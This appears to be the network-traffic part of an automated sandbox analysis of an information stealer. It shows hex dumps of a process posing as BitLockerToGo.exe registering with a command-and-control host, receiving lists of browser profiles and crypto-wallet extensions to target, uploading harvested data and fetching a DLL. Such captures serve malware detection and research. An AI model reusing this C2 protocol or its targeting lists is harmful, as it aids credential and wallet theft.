                                                                                                                                                                                                                                                                                                                  2024-11-21 14:47:51 UTC12314INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 66 75 34 63 68 6d 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e
                                                                                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @fu4chmo</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  2192.168.2.84971249.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:47:54 UTC226OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:47:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:47:54 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:47:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  3192.168.2.84971349.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:47:56 UTC318OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----GDBFBFCBFBKECAAKJKFB
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Content-Length: 256
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:47:56 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 38 37 35 43 35 34 46 45 34 42 33 38 33 37 37 33 34 39 34 37 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 33 35 62 35 63 65 62 38 65 64 30 39 39 35 31 65 62 38 64 35 65 37 37 36 38 31 35 61 64 37 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 2d 2d 0d
                                                                                                                                                                                                                                                                                                                  Data Ascii: ------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="hwid"A1875C54FE4B3837734947-a33c7340-61ca------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------GDBFBFCBFBKECAAKJKFB--
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:47:57 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:47:57 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:47:57 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 31 33 66 65 66 66 62 30 31 31 61 37 39 63 34 30 35 33 36 61 61 34 61 37 66 31 32 36 37 65 66 66 7c 31 7c 30 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 3a1|1|1|1|13feffb011a79c40536aa4a7f1267eff|1|0|1|0|0|50000|10


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  4192.168.2.84971449.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:47:59 UTC318OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----BAAAKJDAAFBAAKEBAAKF
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:47:59 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 41 41 4b 4a 44 41 41 46 42 41 41 4b 45 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 65 66 66 62 30 31 31 61 37 39 63 34 30 35 33 36 61 61 34 61 37 66 31 32 36 37 65 66 66 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 41 4b 4a 44 41 41 46 42 41 41 4b 45 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 33 35 62 35 63 65 62 38 65 64 30 39 39 35 31 65 62 38 64 35 65 37 37 36 38 31 35 61 64 37 32 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 41 4b 4a 44 41 41 46 42 41 41 4b 45 42 41 41 4b 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                  Data Ascii: ------BAAAKJDAAFBAAKEBAAKFContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------BAAAKJDAAFBAAKEBAAKFContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------BAAAKJDAAFBAAKEBAAKFCont
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:00 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:47:59 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:00 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                                                                                  Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  5192.168.2.84971549.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:01 UTC318OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----GCAEHDBAAECBFHJKFCFB
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:01 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 65 66 66 62 30 31 31 61 37 39 63 34 30 35 33 36 61 61 34 61 37 66 31 32 36 37 65 66 66 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 33 35 62 35 63 65 62 38 65 64 30 39 39 35 31 65 62 38 64 35 65 37 37 36 38 31 35 61 64 37 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                  Data Ascii: ------GCAEHDBAAECBFHJKFCFBContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------GCAEHDBAAECBFHJKFCFBContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------GCAEHDBAAECBFHJKFCFBCont
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:02 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:02 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:02 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                                                                  Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  6192.168.2.84971749.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:03 UTC318OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----IIEHJKJJJECFHJJJKKEC
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Content-Length: 332
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:03 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 65 66 66 62 30 31 31 61 37 39 63 34 30 35 33 36 61 61 34 61 37 66 31 32 36 37 65 66 66 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 33 35 62 35 63 65 62 38 65 64 30 39 39 35 31 65 62 38 64 35 65 37 37 36 38 31 35 61 64 37 32 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                  Data Ascii: ------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------IIEHJKJJJECFHJJJKKECCont
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:04 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:04 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:04 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  7192.168.2.84971652.149.20.212443
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:04 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=K5TeakZvcdonXR3&MD=a3Dubbab HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                                                  Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:04 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                  ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                                                                                                                                                  MS-CorrelationId: 9c6ad1e9-657a-439b-a6a7-b52224995e74
                                                                                                                                                                                                                                                                                                                  MS-RequestId: d79e00a7-3dcb-45af-b0b0-302d3b7275e3
                                                                                                                                                                                                                                                                                                                  MS-CV: ACxs+sG/vUmfr3cb.0
                                                                                                                                                                                                                                                                                                                  X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:04 GMT
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Content-Length: 30005
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:04 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                                                                                                                                                  Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:05 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                                                                                                                                                  Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  8192.168.2.84971849.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:06 UTC319OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----IIIDAKJDHJKFHIEBFCGH
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Content-Length: 6913
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:06 UTC6913OUTData Raw: 2d 2d 2d 2d 2d 2d 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 65 66 66 62 30 31 31 61 37 39 63 34 30 35 33 36 61 61 34 61 37 66 31 32 36 37 65 66 66 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 33 35 62 35 63 65 62 38 65 64 30 39 39 35 31 65 62 38 64 35 65 37 37 36 38 31 35 61 64 37 32 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 43 47 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                  Data Ascii: ------IIIDAKJDHJKFHIEBFCGHContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------IIIDAKJDHJKFHIEBFCGHContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------IIIDAKJDHJKFHIEBFCGHCont
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:07 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:07 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:07 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  9192.168.2.84971949.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:07 UTC234OUTGET /sqlo.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:08 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:07 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
